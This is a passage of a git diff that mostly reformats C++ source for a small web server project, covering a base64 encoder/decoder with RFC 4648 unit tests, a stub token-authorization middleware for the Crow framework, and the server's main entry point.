nop, 62, nop, nop, nop, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, + nop, nop, nop, nop, nop, nop, nop, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, + 22, 23, 24, 25, nop, nop, nop, nop, nop, nop, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, + 45, 46, 47, 48, 49, 50, 51, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, + nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop, nop}; unsigned int input_length = input.size(); @@ -90,29 +76,29 @@ bool base64_decode(const gsl::cstring_span<> &input, std::string &output) for (unsigned int i = 0; i < input_length; i++) { char base64code0; char base64code1; - char base64code2 = 0; // initialized to 0 to suppress warnings + char base64code2 = 0; // initialized to 0 to suppress warnings char base64code3; base64code0 = decoding_data[static_cast<int>(input[i])]; - if (base64code0 == nop) // non base64 character + if (base64code0 == nop) // non base64 character return false; - if (!(++i < input_length)) // we need at least two input bytes for first - // byte output + if (!(++i < input_length)) // we need at least two input bytes for first + // byte output return false; base64code1 = decoding_data[static_cast<int>(input[i])]; - if (base64code1 == nop) // non base64 character + if (base64code1 == nop) // non base64 character return false; output += ((base64code0 << 2) | ((base64code1 >> 4) & 0x3)); if (++i < input_length) { char c = input[i]; - if (c == '=') { // padding , end of input + if (c == '=') { // padding , end of input assert((base64code1 & 0x0f) == 0); return true; } base64code2 = decoding_data[static_cast<int>(input[i])]; - if (base64code2 == nop) // non base64 character + if (base64code2 == nop) // non base64 character return false; output += ((base64code1 << 4) & 0xf0) | ((base64code2 >> 2) & 0x0f); @@ -120,12 +106,12 @@ bool base64_decode(const gsl::cstring_span<> &input, std::string &output) if (++i < input_length) { char c = input[i]; - if (c == '=') { // padding , end of input + if (c == '=') { // padding , end of input assert((base64code2 & 0x03) == 0); return true; } base64code3 = decoding_data[static_cast<int>(input[i])]; - if (base64code3 == nop) // non base64 character + if (base64code3 == nop) // non base64 character return false; output += (((base64code2 << 6) & 0xc0) | base64code3); @@ -134,5 +120,4 @@ bool base64_decode(const gsl::cstring_span<> &input, std::string &output) return true; } - }
\ No newline at end of file diff --git a/src/base64_test.cpp b/src/base64_test.cpp index 3484976034..2758dfa80f 100644 --- a/src/base64_test.cpp +++ b/src/base64_test.cpp @@ -1,62 +1,58 @@ #include "base64.hpp" -#include "gtest/gtest.h" #include "big_list_of_naughty_strings.hpp" +#include "gtest/gtest.h" // Tests that Base64 basic strings work -TEST(Base64, EncodeBasicString) -{ - std::string output; - EXPECT_TRUE(base64::base64_encode("Foo", output)); +TEST(Base64, EncodeBasicString) { + std::string output; + EXPECT_TRUE(base64::base64_encode("Foo", output)); } // Tests the test vectors available in the base64 spec -TEST(Base64, EncodeRFC4648) -{ - std::string output; - EXPECT_TRUE(base64::base64_encode("", output)); - EXPECT_EQ(output, ""); - EXPECT_TRUE(base64::base64_encode("f", output)); - EXPECT_EQ(output, "Zg=="); - EXPECT_TRUE(base64::base64_encode("fo", output)); - EXPECT_EQ(output, "Zm8="); - EXPECT_TRUE(base64::base64_encode("foo", output)); - EXPECT_EQ(output, "Zm9v"); - EXPECT_TRUE(base64::base64_encode("foob", output)); - EXPECT_EQ(output, "Zm9vYg=="); - EXPECT_TRUE(base64::base64_encode("fooba", output)); - EXPECT_EQ(output, "Zm9vYmE="); - EXPECT_TRUE(base64::base64_encode("foobar", output)); - EXPECT_EQ(output, "Zm9vYmFy"); +TEST(Base64, EncodeRFC4648) { + std::string output; + EXPECT_TRUE(base64::base64_encode("", output)); + EXPECT_EQ(output, ""); + EXPECT_TRUE(base64::base64_encode("f", output)); + EXPECT_EQ(output, "Zg=="); + EXPECT_TRUE(base64::base64_encode("fo", output)); + EXPECT_EQ(output, "Zm8="); + EXPECT_TRUE(base64::base64_encode("foo", output)); + EXPECT_EQ(output, "Zm9v"); + EXPECT_TRUE(base64::base64_encode("foob", output)); + EXPECT_EQ(output, "Zm9vYg=="); + EXPECT_TRUE(base64::base64_encode("fooba", output)); + EXPECT_EQ(output, "Zm9vYmE="); + EXPECT_TRUE(base64::base64_encode("foobar", output)); + EXPECT_EQ(output, "Zm9vYmFy"); } // Tests the test vectors available in the base64 spec -TEST(Base64, DecodeRFC4648) -{ - std::string output; - EXPECT_TRUE(base64::base64_decode("", output)); - EXPECT_EQ(output, ""); - EXPECT_TRUE(base64::base64_decode("Zg==", output)); - EXPECT_EQ(output, "f"); - EXPECT_TRUE(base64::base64_decode("Zm8=", output)); - EXPECT_EQ(output, "fo"); - EXPECT_TRUE(base64::base64_decode("Zm9v", output)); - EXPECT_EQ(output, "foo"); - EXPECT_TRUE(base64::base64_decode("Zm9vYg==", output)); - EXPECT_EQ(output, "foob"); - EXPECT_TRUE(base64::base64_decode("Zm9vYmE=", output)); - EXPECT_EQ(output, "fooba"); - EXPECT_TRUE(base64::base64_decode("Zm9vYmFy", output)); - EXPECT_EQ(output, "foobar"); +TEST(Base64, DecodeRFC4648) { + std::string output; + EXPECT_TRUE(base64::base64_decode("", output)); + EXPECT_EQ(output, ""); + EXPECT_TRUE(base64::base64_decode("Zg==", output)); + EXPECT_EQ(output, "f"); + EXPECT_TRUE(base64::base64_decode("Zm8=", output)); + EXPECT_EQ(output, "fo"); + EXPECT_TRUE(base64::base64_decode("Zm9v", output)); + EXPECT_EQ(output, "foo"); + EXPECT_TRUE(base64::base64_decode("Zm9vYg==", output)); + EXPECT_EQ(output, "foob"); + EXPECT_TRUE(base64::base64_decode("Zm9vYmE=", output)); + EXPECT_EQ(output, "fooba"); + EXPECT_TRUE(base64::base64_decode("Zm9vYmFy", output)); + EXPECT_EQ(output, "foobar"); } // Tests using pathalogical cases for all escapings -TEST(Base64, NaugtyStrings){ - std::string base64_string; - std::string decoded_string; - for (auto& str: naughty_strings){ - EXPECT_TRUE(base64::base64_encode(str, base64_string)); - EXPECT_TRUE(base64::base64_decode(base64_string, decoded_string)); - EXPECT_EQ(str, decoded_string); - } +TEST(Base64, NaugtyStrings) { + std::string base64_string; + std::string decoded_string; + for (auto& str : naughty_strings) { + EXPECT_TRUE(base64::base64_encode(str, base64_string)); + EXPECT_TRUE(base64::base64_decode(base64_string, decoded_string)); + EXPECT_EQ(str, decoded_string); + } } - diff --git a/src/token_authorization_middleware.cpp b/src/token_authorization_middleware.cpp index d1972fadf1..aeef58c6a9 100644 --- a/src/token_authorization_middleware.cpp +++ b/src/token_authorization_middleware.cpp @@ -4,49 +4,38 @@ #include <token_authorization_middleware.hpp> -namespace crow -{ - std::string TokenAuthorizationMiddleware::context::get_cookie(const std::string& key) - { - if (cookie_sessions.count(key)) - return cookie_sessions[key]; - return {}; - } - - void TokenAuthorizationMiddleware::context::set_cookie(const std::string& key, const std::string& value) - { - cookies_to_push_to_client.emplace(key, value); - } - - - void TokenAuthorizationMiddleware::before_handle(crow::request& req, response& res, context& ctx) - { - auto return_unauthorized = [&req, &res](){ - res.code = 401; - res.end(); - }; - if (req.url == "/login"){ - - } - // Check for an authorization header, reject if not present - if (req.headers.count("Authorization") != 1) { - return_unauthorized(); - return; - } - - std::string auth_header = req.get_header_value("Authorization"); - // If the user is attempting any kind of auth other than token, reject - if (!boost::starts_with(auth_header, "Token ")) { - return_unauthorized(); - return; - } - } - - void TokenAuthorizationMiddleware::after_handle(request& /*req*/, response& res, context& ctx) - { - for (auto& cookie : ctx.cookies_to_push_to_client) { - res.add_header("Set-Cookie", cookie.first + "=" + cookie.second); - } - } - +namespace crow { +std::string TokenAuthorizationMiddleware::context::get_cookie(const std::string& key) { + if (cookie_sessions.count(key)) return cookie_sessions[key]; + return {}; +} + +void TokenAuthorizationMiddleware::context::set_cookie(const std::string& key, const std::string& value) { cookies_to_push_to_client.emplace(key, value); } + +void TokenAuthorizationMiddleware::before_handle(crow::request& req, response& res, context& ctx) { + auto return_unauthorized = [&req, &res]() { + res.code = 401; + res.end(); + }; + if (req.url == "/login") { + } + // Check for an authorization header, reject if not present + if (req.headers.count("Authorization") != 1) { + return_unauthorized(); + return; + } + + std::string auth_header = req.get_header_value("Authorization"); + // If the user is attempting any kind of auth other than token, reject + if (!boost::starts_with(auth_header, "Token ")) { + return_unauthorized(); + return; + } +} + +void TokenAuthorizationMiddleware::after_handle(request& /*req*/, response& res, context& ctx) { + for (auto& cookie : ctx.cookies_to_push_to_client) { + res.add_header("Set-Cookie", cookie.first + "=" + cookie.second); + } +} }
\ No newline at end of file diff --git a/src/token_authorization_middleware_test.cpp b/src/token_authorization_middleware_test.cpp index 39a12cd546..aef33e35a7 100644 --- a/src/token_authorization_middleware_test.cpp +++ b/src/token_authorization_middleware_test.cpp @@ -2,27 +2,23 @@ #include <crow/app.h> #include "gtest/gtest.h" - // Tests that Base64 basic strings work -TEST(Authentication, TestBasicReject) -{ - /* - crow::App<crow::TokenAuthorizationMiddleware> app; - crow::request req; - crow::response res; - app.handle(req, res); - ASSERT_EQ(res.code, 400); +TEST(Authentication, TestBasicReject) { + /* + crow::App<crow::TokenAuthorizationMiddleware> app; + crow::request req; + crow::response res; + app.handle(req, res); + ASSERT_EQ(res.code, 400); - crow::App<crow::TokenAuthorizationMiddleware> app; - decltype(app)::server_t server(&app, "127.0.0.1", 45451); - CROW_ROUTE(app, "/")([&](const crow::request& req) - { - app.get_context<NullMiddleware>(req); - app.get_context<NullSimpleMiddleware>(req); - return ""; - }); - */ + crow::App<crow::TokenAuthorizationMiddleware> app; + decltype(app)::server_t server(&app, "127.0.0.1", 45451); + CROW_ROUTE(app, "/")([&](const crow::request& req) + { + app.get_context<NullMiddleware>(req); + app.get_context<NullSimpleMiddleware>(req); + return ""; + }); + */ } - - diff --git a/src/webserver_main.cpp b/src/webserver_main.cpp index 6c92e34737..32c5d35067 100644 --- a/src/webserver_main.cpp +++ b/src/webserver_main.cpp @@ -22,8 +22,8 @@ #include "crow/websocket.h" #include "color_cout_g3_sink.hpp" -#include "webassets.hpp" #include "token_authorization_middleware.hpp" +#include "webassets.hpp" #include <iostream> #include <string> @@ -31,25 +31,23 @@ #include <webassets.hpp> -int main(int argc, char** argv) -{ - auto worker = g3::LogWorker::createLogWorker(); - auto handle = worker->addDefaultLogger(argv[0], "/tmp/"); - g3::initializeLogging(worker.get()); - auto log_file_name = handle->call(&g3::FileSink::fileName); - auto sink_handle = worker->addSink(std::make_unique<crow::ColorCoutSink>(), - &crow::ColorCoutSink::ReceiveLogMessage); +int main(int argc, char** argv) { + auto worker = g3::LogWorker::createLogWorker(); + auto handle = worker->addDefaultLogger(argv[0], "/tmp/"); + g3::initializeLogging(worker.get()); + auto log_file_name = handle->call(&g3::FileSink::fileName); + auto sink_handle = worker->addSink(std::make_unique<crow::ColorCoutSink>(), &crow::ColorCoutSink::ReceiveLogMessage); - LOG(DEBUG) << "Logging to " << log_file_name.get() << "\n"; + LOG(DEBUG) << "Logging to " << log_file_name.get() << "\n"; - std::string ssl_pem_file("server.pem"); - ensuressl::ensure_openssl_key_present_and_valid(ssl_pem_file); + std::string ssl_pem_file("server.pem"); + ensuressl::ensure_openssl_key_present_and_valid(ssl_pem_file); - crow::App<crow::TokenAuthorizationMiddleware> app; + crow::App<crow::TokenAuthorizationMiddleware> app; - crow::webassets::request_routes(app); + crow::webassets::request_routes(app); - crow::logger::setLogLevel(crow::LogLevel::DEBUG); + crow::logger::setLogLevel(crow::LogLevel::DEBUG); - app.port(18080).run(); + app.port(18080).run(); } |